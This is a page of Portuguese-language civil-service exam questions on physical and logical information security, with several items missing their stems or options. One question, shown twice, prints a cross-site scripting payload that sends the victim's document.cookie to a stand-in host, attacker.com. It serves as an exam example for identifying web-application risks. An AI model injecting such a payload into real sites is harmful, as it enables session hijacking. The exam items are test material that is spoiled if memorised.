Questões de Concurso
Sobre segurança física e lógica em segurança da informação
Foram encontradas 108 questões
I. O objetivo da segurança física é de obter a integridade dos equipamentos e dispositivos que estão dentro da rede da empresa.
II. Ter sistema de refrigeração dentro da sala de servidores é uma medida de segurança física.
III. Utilizar parafusos com cabeça lisa para prender roteadores e switches não pode ser considerada uma medida de segurança física.
IV. O servidor redundante pode ser instalado e configurado para o único propósito de acesso à Internet.
( ) Conforme o conceito de segurança física, para todos os dispositivos de uma rede, há uma maneira de se fazer segurança.
( ) Equipamentos e dispositivos que ficam perto dos colaboradores da empresa devem ser filmados e monitorados por sistemas de segurança.
( ) Sobre a atualização das versões dos softwares, quando homologados, os testes são dispensados.
( ) Embora o cabeado esteja internamente no piso ou na parede, devem ser testados periodicamente.
A ordem correta de preenchimento dos parênteses, de cima para baixo, é:
I. temas relacionados à segurança da informação, de forma ampla, que sejam essenciais para segurança cibernética.
II. segurança lógica e proteção de dados específicos do nível operacional, nos aspectos relacionados aos requisitos funcionais.
III. segurança física e proteção de ativos de tecnologia da informação de forma geral;
IV. ações destinadas a assegurar, de forma automatizada, a não invasão física de localidades e de informações.
Está correto o que consta APENAS de
Com relação à segurança da informação, julgue o item seguinte.
Os detectores de incêndio são mecanismos eletrônicos que
acionam alarmes em casos de fogo nas instalações e, nessa
situação, funcionam como soluções de segurança digital de
ambientes de TI.
Uma área de escritório de determinada empresa é definida como de alta criticidade, tal que somente uma pequena parte de funcionários deve ter acesso às informações confidenciais utilizadas nesse ambiente.
Nessa situação, para controlar a segurança física na área em questão, é correto
Com relação à segurança física e lógica e à operação de segurança da informação, julgue o item a seguir.
A proteção de perímetro é usada para dissuadir invasões e
para possibilitar que as pessoas utilizem entradas controladas
para entrar em uma instalação.
Com relação à segurança física e lógica e à operação de segurança da informação, julgue o item a seguir.
A despeito de sua capacidade de agregação e correlação
automatizada de dados de eventos provenientes de várias
fontes, as soluções SIEM são ineficazes em processos de
coleta e verificação de dados de conformidade no âmbito da
infraestrutura de negócios.
No que se refere a trabalho remoto, rotinas de segurança da informação e recuperação de arquivos, aplicativos para segurança e conformidade, julgue o item subsecutivo.
Recomenda-se a utilização de dois ou mais tipos de software de controle contra malware, durante manutenções e procedimentos
de emergência, para aumentar a eficácia no que se refere à proteção contra ameaças.
Trata(m)-se de desvantagem (ns) do método:
I. Alto custo II. Baixa garantia de sucesso III. Alguns dos arquivos recuperados podem vir corrompidos
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Muitas aplicações web e APIs não protegem de forma
adequada dados sensíveis, como dados financeiros, de saúde
ou de identificação pessoal, por isso, para sua proteção, é
necessário classificar os dados processados, armazenados ou
transmitidos pela aplicação.
Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.
><script>document.location=
'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>
Nesse caso, o risco de segurança da aplicação é a desserialização insegura.
Limitar o número máximo de tentativas de autenticação
falhadas, ou atrasar progressivamente essa operação, e
registar todas as falhas e alertar os administradores quando
detectados ataques de teste exaustivo ou de força bruta são
formas de prevenir a quebra de autenticação.